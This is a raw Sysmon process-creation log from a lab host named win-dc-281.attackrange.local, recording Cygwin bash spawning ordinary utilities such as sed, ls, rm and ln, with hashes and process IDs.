14:56:02.673{A8622C2F-5402-6078-3A0C-00000000AE01}6432C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057305Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.664{A8622C2F-5402-6078-390C-00000000AE01}5832C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-380C-00000000AE01}4364C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057295Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.656{A8622C2F-5402-6078-380C-00000000AE01}4364C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-360C-00000000AE01}6332C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057285Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.648{A8622C2F-5402-6078-370C-00000000AE01}3368C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-360C-00000000AE01}6332C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057273Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.640{A8622C2F-5402-6078-360C-00000000AE01}6332C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057261Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.631{A8622C2F-5402-6078-350C-00000000AE01}1100C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-340C-00000000AE01}1736C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057251Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.623{A8622C2F-5402-6078-340C-00000000AE01}1736C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-320C-00000000AE01}3200C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057241Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.615{A8622C2F-5402-6078-330C-00000000AE01}6672C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-320C-00000000AE01}3200C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057229Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.607{A8622C2F-5402-6078-320C-00000000AE01}3200C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057217Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.600{A8622C2F-5402-6078-310C-00000000AE01}5344C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5402-6078-300C-00000000AE01}7140C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057207Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.591{A8622C2F-5402-6078-300C-00000000AE01}7140C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057195Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.583{A8622C2F-5402-6078-2F0C-00000000AE01}3156C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5402-6078-2E0C-00000000AE01}5852C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057185Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.574{A8622C2F-5402-6078-2E0C-00000000AE01}5852C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057175Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.567{A8622C2F-5402-6078-2D0C-00000000AE01}5144C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5402-6078-2C0C-00000000AE01}6556C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057165Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.559{A8622C2F-5402-6078-2C0C-00000000AE01}6556C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057155Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.550{A8622C2F-5402-6078-2B0C-00000000AE01}1800C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5402-6078-2A0C-00000000AE01}3304C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057145Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.542{A8622C2F-5402-6078-2A0C-00000000AE01}3304C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-290C-00000000AE01}3176C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057135Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.534{A8622C2F-5402-6078-290C-00000000AE01}3176C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057123Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.525{A8622C2F-5402-6078-280C-00000000AE01}6748C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-270C-00000000AE01}3220C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057113Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.517{A8622C2F-5402-6078-270C-00000000AE01}3220C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-250C-00000000AE01}5832C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057103Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.509{A8622C2F-5402-6078-260C-00000000AE01}1156C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-250C-00000000AE01}5832C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057091Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.501{A8622C2F-5402-6078-250C-00000000AE01}5832C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057079Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.492{A8622C2F-5402-6078-240C-00000000AE01}4696C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-230C-00000000AE01}6700C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057069Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.484{A8622C2F-5402-6078-230C-00000000AE01}6700C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-210C-00000000AE01}1100C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057059Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.476{A8622C2F-5402-6078-220C-00000000AE01}5052C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-210C-00000000AE01}1100C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057047Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.468{A8622C2F-5402-6078-210C-00000000AE01}1100C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057035Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.460{A8622C2F-5402-6078-200C-00000000AE01}5344C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5402-6078-1F0C-00000000AE01}3788C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057025Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.452{A8622C2F-5402-6078-1F0C-00000000AE01}3788C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057011Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.442{A8622C2F-5402-6078-1E0C-00000000AE01}3156C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5402-6078-1D0C-00000000AE01}3208C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057001Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.434{A8622C2F-5402-6078-1D0C-00000000AE01}3208C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056991Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.426{A8622C2F-5402-6078-1C0C-00000000AE01}5144C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5402-6078-1B0C-00000000AE01}928C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056981Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.418{A8622C2F-5402-6078-1B0C-00000000AE01}928C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056971Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.410{A8622C2F-5402-6078-1A0C-00000000AE01}4344C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5402-6078-190C-00000000AE01}4604C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056961Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.401{A8622C2F-5402-6078-190C-00000000AE01}4604C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-180C-00000000AE01}1800C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056951Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.393{A8622C2F-5402-6078-180C-00000000AE01}1800C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056939Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.384{A8622C2F-5402-6078-170C-00000000AE01}6332C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-160C-00000000AE01}4056C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056929Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.375{A8622C2F-5402-6078-160C-00000000AE01}4056C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-140C-00000000AE01}6748C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056919Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.367{A8622C2F-5402-6078-150C-00000000AE01}612C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-140C-00000000AE01}6748C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056907Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.359{A8622C2F-5402-6078-140C-00000000AE01}6748C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056895Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.351{A8622C2F-5402-6078-130C-00000000AE01}3200C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-120C-00000000AE01}6884C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056885Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.342{A8622C2F-5402-6078-120C-00000000AE01}6884C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-100C-00000000AE01}4696C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056875Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.334{A8622C2F-5402-6078-110C-00000000AE01}2084C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-100C-00000000AE01}4696C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056863Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.326{A8622C2F-5402-6078-100C-00000000AE01}4696C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000056851Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 